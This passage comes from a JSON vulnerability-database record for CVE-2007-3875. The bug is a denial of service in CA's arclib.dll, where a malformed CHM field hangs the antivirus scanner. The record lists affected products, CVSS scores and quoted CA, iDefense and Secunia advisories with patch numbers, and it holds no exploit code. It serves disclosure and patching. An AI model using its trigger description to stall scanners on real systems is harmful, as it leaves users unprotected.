{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_intrusion_detection:2.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:secure_content_manager:8.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:threat_manager:8:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:anti_virus_sdk:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:antispyware_for_the_enterprise:8:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:brightstor_arcserve_client:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:brightstor_enterprise_backup:10.5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_ez_armor:1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_ez_armor:2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:internet_security_suite:3.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:protection_suites:r2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_network_and_systems_management:3.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_network_and_systems_management:3.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:anti-spyware:2007:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:antispyware_for_the_enterprise:8.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:antivirus_sdk:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:brigthstor_arcserve_client_for_windows:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:common_services:11:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_ez_armor:3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_internet_security_suite:1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:protection_suites:r3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:secure_content_manager:1.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:anti-virus_for_the_enterprise:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "8",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2007-3875"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "iDEFENSE",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200707-453"
}
],
"trust": 0.6
},
"cve": "CVE-2007-3875",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 4.3,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2007-3875",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-27237",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2007-3875",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-200707-453",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-27237",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-27237"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-002374"
},
{
"db": "NVD",
"id": "CVE-2007-3875"
},
{
"db": "CNNVD",
"id": "CNNVD-200707-453"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "arclib.dll before 7.3.0.9 in CA Anti-Virus (formerly eTrust Antivirus) 8 and certain other CA products allows remote attackers to cause a denial of service (infinite loop and loss of antivirus functionality) via an invalid \"previous listing chunk number\" field in a CHM file. Multiple Computer Associates products are prone to a denial-of-service vulnerability because the applications fail to handle malformed CHM files. \nSuccessfully exploiting this issue will cause the affected applications to stop responding, denying service to legitimate users. \nThis issue affects applications that use the \u0027arclib.dll\u0027 library versions prior to 7.3.0.9. The Arclib.DLL library in eTrust products has a security vulnerability. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nTitle: [CAID 35525, 35526]: CA Products Arclib Library Denial of \nService Vulnerabilities\n\nCA Vuln ID (CAID): 35525, 35526\n\nCA Advisory Date: 2007-07-24\n\nReported By:\nCVE-2006-5645 - Titon of BastardLabs and Damian Put \n \u003cpucik at overflow dot pl\u003e working with the iDefense VCP. \nCVE-2007-3875 - An anonymous researcher working with the iDefense \n VCP. \nSergio Alvarez of n.runs AG also reported these issues. \n\nImpact: A remote attacker can cause a denial of service. \n\nSummary: CA products that utilize the Arclib library contain two \ndenial of service vulnerabilities. The second vulnerability, \nCVE-2006-5645, is due to an application hang when processing a \nspecially malformed RAR file. \n\nMitigating Factors: None\n\nSeverity: CA has given these vulnerabilities a Medium risk rating. \n\nAffected Products:\nCA Anti-Virus for the Enterprise (formerly eTrust Antivirus) 7.0, \n 7.1, r8, r8.1\nCA Anti-Virus 2007 (v8)\neTrust EZ Antivirus r7, r6.1\nCA Internet Security Suite 2007 (v3)\neTrust Internet Security Suite r1, r2\neTrust EZ Armor r1, r2, r3.x\nCA Threat Manager for the Enterprise (formerly eTrust Integrated \n Threat Management) r8\nCA Anti-Virus Gateway (formerly eTrust Antivirus eTrust Antivirus \n Gateway) 7.1\nCA Protection Suites r2, r3\nCA Secure Content Manager (formerly eTrust Secure Content Manager) \n 1.1, 8.0\nCA Anti-Spyware for the Enterprise (Formerly eTrust PestPatrol) \n r8, 8.1\nCA Anti-Spyware 2007\nUnicenter Network and Systems Management (NSM) r3.0, r3.1, r11, \n r11.1\nBrightStor ARCserve Backup v9.01, r11 for Windows, r11.1, r11.5\nBrightStor Enterprise Backup r10.5\nBrightStor ARCserve Client agent for Windows\neTrust Intrusion Detection 2.0 SP1, 3.0, 3.0 SP1\nCA Common Services (CCS) r11, r11.1\nCA Anti-Virus SDK (formerly eTrust Anti-Virus SDK)\n\nStatus and Recommendation:\nCA has provided an update to address the vulnerabilities. The \nupdated Arclib library is provided in automatic content updates \nwith most products. Ensure that the latest content update is \ninstalled. In the case where automatic updates are not available, \nuse the following product specific instructions. \n\nCA Secure Content Manager 1.1:\nApply QO89469. \n\nCA Secure Content Manager 8.0:\nApply QO87114. \n\nUnicenter Network and Systems Management (NSM) r3.0:\nApply QO89141. \n\nUnicenter Network and Systems Management (NSM) r3.1:\nApply QO89139. \n\nUnicenter Network and Systems Management (NSM) r11:\nApply QO89140. \n\nUnicenter Network and Systems Management (NSM) r11.1:\nApply QO89138. \n\nCA Common Services (CCS) r11:\nApply QO89140. \n\nCA Common Services (CCS) r11.1:\nApply QO89138. \n\nCA Anti-Virus Gateway 7.1:\nApply QO89381. \n\neTrust Intrusion Detection 2.0 SP1:\nApply QO89474. \n\neTrust Intrusion Detection 3.0:\nApply QO86925. \n\neTrust Intrusion Detection 3.0 SP1:\nApply QO86923. \n\nCA Protection Suites r2:\nApply updates for CA Anti-Virus 7.1. \n\nBrightStor ARCserve Backup and BrightStor ARCserve Client agent \nfor Windows:\n\nManually replace the arclib.dll file with the one provided in the \nCA Anti-Virus 7.1 fix set. \n\n1. Locate and rename the existing arclib.dll file. \n2. Download the CA Anti-Virus 7.1 patch that matches the host \n operating system. \n3. Unpack the patch and place the arclib.dll file in directory \n where the existing arclib.dll file was found in step 1. \n4. Reboot the host. \n\nCA Anti-Virus 7.1 (non Windows):\n\nT229327 \u2013 Solaris \u2013 QO86831\nT229328 \u2013 Netware \u2013 QO86832\nT229329 \u2013 MacPPC \u2013 QO86833\nT229330 \u2013 MacIntel \u2013 QO86834\nT229331 \u2013 Linux390 \u2013 QO86835\nT229332 \u2013 Linux \u2013 QO86836\nT229333 \u2013 HP-UX \u2013 QO86837\n\nCA Anti-Virus 7.1 (Windows):\n\nT229337 \u2013 NT (32 bit) \u2013 QO86843\nT229338 \u2013 NT (AMD64) \u2013 QO86846\n\nCA Threat Manager for the Enterprise r8.1 (non Windows):\n\nT229334 \u2013 Linux \u2013 QO86839 \nT229335 \u2013 Mac \u2013 QO86828\nT229336 \u2013 Solaris \u2013 QO86829\n\nHow to determine if you are affected:\nFor products on Windows:\n1. Using Windows Explorer, locate the file \u201carclib.dll\u201d. By \n default, the file is located in the \n \u201cC:\\Program Files\\CA\\SharedComponents\\ScanEngine\u201d directory(*). \n2. Right click on the file and select Properties. \n3. Select the Version tab. \n4. If the file version is earlier than indicated in the table \n below, the installation is vulnerable. \n\nFile Name File Version\narclib.dll 7.3.0.9\n\n*For eTrust Intrusion Detection 2.0 the file is located in \n\u201cProgram Files\\eTrust\\Intrusion Detection\\Common\u201d, and for eTrust \nIntrusion Detection 3.0 and 3.0 sp1, the file is located in \n\u201cProgram Files\\CA\\Intrusion Detection\\Common\u201d. \n\nFor CA Anti-Virus r8.1 on non-Windows:\nUse the compver utility provided on the CD to determine the \nversion of arclib.dll. The same version information above applies. \n\nWorkaround: None\n\nReferences (URLs may wrap):\nCA SupportConnect:\nhttp://supportconnect.ca.com/\nSecurity Notice for CA Products Containing Arclib\nhttp://supportconnectw.ca.com/public/antivirus/infodocs/caprodarclib-secnot\n.asp\nSolution Document Reference APARs:\nQO89469, QO87114, QO89141, QO89139, QO89140, QO89138, QO89140, \nQO89138, QO89381, QO89474, QO86925, QO86923, QO86831, QO86832, \nQO86833, QO86834, QO86835, QO86836, QO86837, QO86843, QO86846, \nQO86839, QO86828, QO86829\nCA Security Advisor posting: \nCA Products Arclib Library Denial of Service Vulnerabilities\nhttp://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=149847\nCA Vuln ID (CAID): 35525, 35526\nhttp://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35525\nhttp://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35526\nReported By:\nCVE-2006-5645 - Titon of BastardLabs and Damian Put \n \u003cpucik at overflow dot pl\u003e working with the iDefense VCP. \nCVE-2007-3875 - An anonymous researcher working with the iDefense \n VCP. \nSergio Alvarez of n.runs AG also reported these issues. \niDefense advisories: \nComputer Associates AntiVirus CHM File Handling DoS Vulnerability\nhttp://labs.idefense.com/intelligence/vulnerabilities/display.php?id=567\nMultiple Vendor Antivirus RAR File Denial of Service Vulnerability\nhttp://labs.idefense.com/intelligence/vulnerabilities/display.php?id=439\nCVE References:\nCVE-2006-5645, CVE-2007-3875\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5645\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3875\nOSVDB References: Pending\nhttp://osvdb.org/\n\nChangelog for this advisory:\nv1.0 - Initial Release\n\nCustomers who require additional information should contact CA\nTechnical Support at http://supportconnect.ca.com. \n\nFor technical questions or comments related to this advisory, \nplease send email to vuln AT ca DOT com. \n\nIf you discover a vulnerability in CA products, please report your\nfindings to vuln AT ca DOT com, or utilize our \"Submit a \nVulnerability\" form. \nURL: http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx\n\n\nRegards,\nKen Williams ; 0xE2941985\nDirector, CA Vulnerability Research\n\nCA, 1 CA Plaza, Islandia, NY 11749\n\t\nContact http://www.ca.com/us/contact/\nLegal Notice http://www.ca.com/us/legal/\nPrivacy Policy http://www.ca.com/us/privacy/\nCopyright (c) 2007 CA. All rights reserved. \n\n-----BEGIN PGP SIGNATURE-----\nVersion: PGP Desktop 9.5.3 (Build 5003)\n\nwj8DBQFGpp9beSWR3+KUGYURAplHAJ4paEd/cX+2AxdBWfnw2zhfjAGQwACfW+mo\ntCqbonQi4DvtQ9a45c65y70=\n=o8Ac\n-----END PGP SIGNATURE-----\n. BACKGROUND\n\neTrust is an antivirus application developed by Computer Associates. \nMore information can be found on the vendor\u0027s website at the following\nURL. \n\nhttp://www3.ca.com/solutions/product.aspx?ID=156\n\nII. DESCRIPTION\n\nRemote exploitation of a denial of Service (DoS) vulnerability in\nComputer Associates Inc.\u0027s eTrust Antivirus products could allow\nattackers to create a DoS condition on the affected computer. \n\nIII. ANALYSIS\n\nThis denial of service attack will prevent the scanner from scanning\nother files on disk while it is stuck on the exploit file. The hung\nprocess can be quit by the user and does not consume all system\nresources. \n\nIV. DETECTION\n\niDefense has confirmed this vulnerability in eTrust AntiVirus version\nr8. Previous versions of eTrust Antivirus are suspected vulnerable. \nOther Computer Associates products, as well as derived products, may\nalso be vulnerable. \n\nV. WORKAROUND\n\niDefense is not aware of any workarounds for this issue. \n\nVI. VENDOR RESPONSE\n\nComputer Associates has addressed this vulnerability by releasing\nupdates. More information is available within Computer Associates\nadvisory at the following URL. \n\nhttp://supportconnectw.ca.com/public/antivirus/infodocs/caprodarclib-secnot.asp\n\nVII. CVE INFORMATION\n\nThe Common Vulnerabilities and Exposures (CVE) project has assigned the\nname CVE-2007-3875 to this issue. This is a candidate for inclusion in\nthe CVE list (http://cve.mitre.org/), which standardizes names for\nsecurity problems. \n\nVIII. DISCLOSURE TIMELINE\n\n01/16/2007 Initial vendor notification\n01/17/2007 Initial vendor response\n07/24/2007 Coordinated public disclosure\n\nIX. CREDIT\n\nThe discoverer of this vulnerability wishes to remain anonymous. \n\nGet paid for vulnerability research\nhttp://labs.idefense.com/methodology/vulnerability/vcp.php\n\nFree tools, research and upcoming events\nhttp://labs.idefense.com/\n\nX. LEGAL NOTICES\n\nCopyright \\xa9 2007 iDefense, Inc. \n\nPermission is granted for the redistribution of this alert\nelectronically. It may not be edited in any way without the express\nwritten consent of iDefense. If you wish to reprint the whole or any\npart of this alert in any other medium other than electronically,\nplease e-mail customerservice@idefense.com for permission. \n\nDisclaimer: The information in the advisory is believed to be accurate\nat the time of publishing based on currently available information. Use\nof the information constitutes acceptance for use in an AS IS condition. \n There are no warranties with regard to this information. Neither the\nauthor nor the publisher accepts any liability for any direct,\nindirect, or consequential loss or damage arising from use of, or\nreliance on, this information. \n\n----------------------------------------------------------------------\n\nTry a new way to discover vulnerabilities that ALREADY EXIST in your\nIT infrastructure. \n\nThe Full Featured Secunia Network Software Inspector (NSI) is now\navailable:\nhttp://secunia.com/network_software_inspector/\n\nThe Secunia NSI enables you to INSPECT, DISCOVER, and DOCUMENT\nvulnerabilities in more than 4,000 different Windows applications. scanning a specially\ncrafted RAR archive. Please see the vendor\u0027s advisory for\ndetails. \n2) The vendor credits Titon of BastardLabs and Damian Put, reported\nvia iDefense Labs. \n\nORIGINAL ADVISORY:\nCA:\nhttp://supportconnectw.ca.com/public/antivirus/infodocs/caprodarclib-secnot.asp\n\niDefense Labs:\nhttp://labs.idefense.com/intelligence/vulnerabilities/display.php?id=567\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2007-3875"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-002374"
},
{
"db": "BID",
"id": "25049"
},
{
"db": "VULHUB",
"id": "VHN-27237"
},
{
"db": "PACKETSTORM",
"id": "58024"
},
{
"db": "PACKETSTORM",
"id": "58018"
},
{
"db": "PACKETSTORM",
"id": "58032"
}
],
"trust": 2.25
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-27237",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-27237"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2007-3875",
"trust": 3.0
},
{
"db": "BID",
"id": "25049",
"trust": 2.0
},
{
"db": "SECUNIA",
"id": "26155",
"trust": 1.8
},
{
"db": "VUPEN",
"id": "ADV-2007-2639",
"trust": 1.7
},
{
"db": "SECTRACK",
"id": "1018450",
"trust": 1.7
},
{
"db": "JVNDB",
"id": "JVNDB-2007-002374",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-200707-453",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "58018",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "58024",
"trust": 0.2
},
{
"db": "VULHUB",
"id": "VHN-27237",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "58032",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-27237"
},
{
"db": "BID",
"id": "25049"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-002374"
},
{
"db": "PACKETSTORM",
"id": "58024"
},
{
"db": "PACKETSTORM",
"id": "58018"
},
{
"db": "PACKETSTORM",
"id": "58032"
},
{
"db": "NVD",
"id": "CVE-2007-3875"
},
{
"db": "CNNVD",
"id": "CNNVD-200707-453"
}
]
},
"id": "VAR-200707-0263",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-27237"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T12:23:46.609000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.ca.com/"
},
{
"title": "CA eTrust Repair measures for multiple product security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=146845"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2007-002374"
},
{
"db": "CNNVD",
"id": "CNNVD-200707-453"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2007-3875"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.2,
"url": "http://supportconnectw.ca.com/public/antivirus/infodocs/caprodarclib-secnot.asp"
},
{
"trust": 2.2,
"url": "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=567"
},
{
"trust": 1.8,
"url": "http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=149847"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/25049"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/archive/1/474601/100/0/threaded"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/archive/1/474605/100/100/threaded"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/archive/1/474683/100/0/threaded"
},
{
"trust": 1.7,
"url": "http://www.securitytracker.com/id?1018450"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/26155"
},
{
"trust": 1.7,
"url": "http://www.vupen.com/english/advisories/2007/2639"
},
{
"trust": 1.7,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/35573"
},
{
"trust": 0.9,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-3875"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2007-3875"
},
{
"trust": 0.3,
"url": "/archive/1/474601"
},
{
"trust": 0.3,
"url": "/archive/1/474568"
},
{
"trust": 0.3,
"url": "/archive/1/474605"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-3875"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-5645"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com."
},
{
"trust": 0.1,
"url": "http://supportconnectw.ca.com/public/antivirus/infodocs/caprodarclib-secnot"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35526"
},
{
"trust": 0.1,
"url": "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=439"
},
{
"trust": 0.1,
"url": "http://osvdb.org/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-5645"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com/"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35525"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/contact/"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/legal/"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/privacy/"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/),"
},
{
"trust": 0.1,
"url": "http://labs.idefense.com/intelligence/vulnerabilities/"
},
{
"trust": 0.1,
"url": "http://www3.ca.com/solutions/product.aspx?id=156"
},
{
"trust": 0.1,
"url": "http://labs.idefense.com/methodology/vulnerability/vcp.php"
},
{
"trust": 0.1,
"url": "http://labs.idefense.com/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14862/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/4088/"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com/sc/redir.jsp?reqpage=search\u0026searchid=qo86829"
},
{
"trust": 0.1,
"url": "http://secunia.com/network_software_inspector/"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com/sc/redir.jsp?reqpage=search\u0026searchid=qo86846"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/314/"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com/sc/redir.jsp?reqpage=search\u0026searchid=qo86837"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14867/"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com/sc/redir.jsp?reqpage=search\u0026searchid=qo86831"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com/sc/redir.jsp?reqpage=search\u0026searchid=qo86835"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14433/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/3099/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/3391/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/4092/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14804/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/8147/"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com/sc/redir.jsp?reqpage=search\u0026searchid=qo89139"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14868/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14434/"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com/sc/redir.jsp?reqpage=search\u0026searchid=qo86828"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com/sc/redir.jsp?reqpage=search\u0026searchid=qo89474\u0026startsearch=1"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com/sc/redir.jsp?reqpage=search\u0026searchid=qo86843"
},
{
"trust": 0.1,
"url": "http://secunia.com/about_secunia_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14864/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14869/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14437/"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com/sc/redir.jsp?reqpage=search\u0026searchid=qo86832"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com/sc/redir.jsp?reqpage=search\u0026searchid=qo89469"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com/sc/redir.jsp?reqpage=search\u0026searchid=qo86839"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14436/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/8144/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/26155/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14866/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14865/"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com/sc/redir.jsp?reqpage=search\u0026searchid=qo89381\u0026startsearch=1"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/1683/"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com/sc/redir.jsp?reqpage=search\u0026searchid=qo86833"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com/sc/redir.jsp?reqpage=search\u0026searchid=qo89138\u0026startsearch=1"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/2198/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/8250/"
},
{
"trust": 0.1,
"url": "http://secunia.com/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14863/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/3390/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/8119/"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com/sc/redir.jsp?reqpage=search\u0026searchid=qo89140"
},
{
"trust": 0.1,
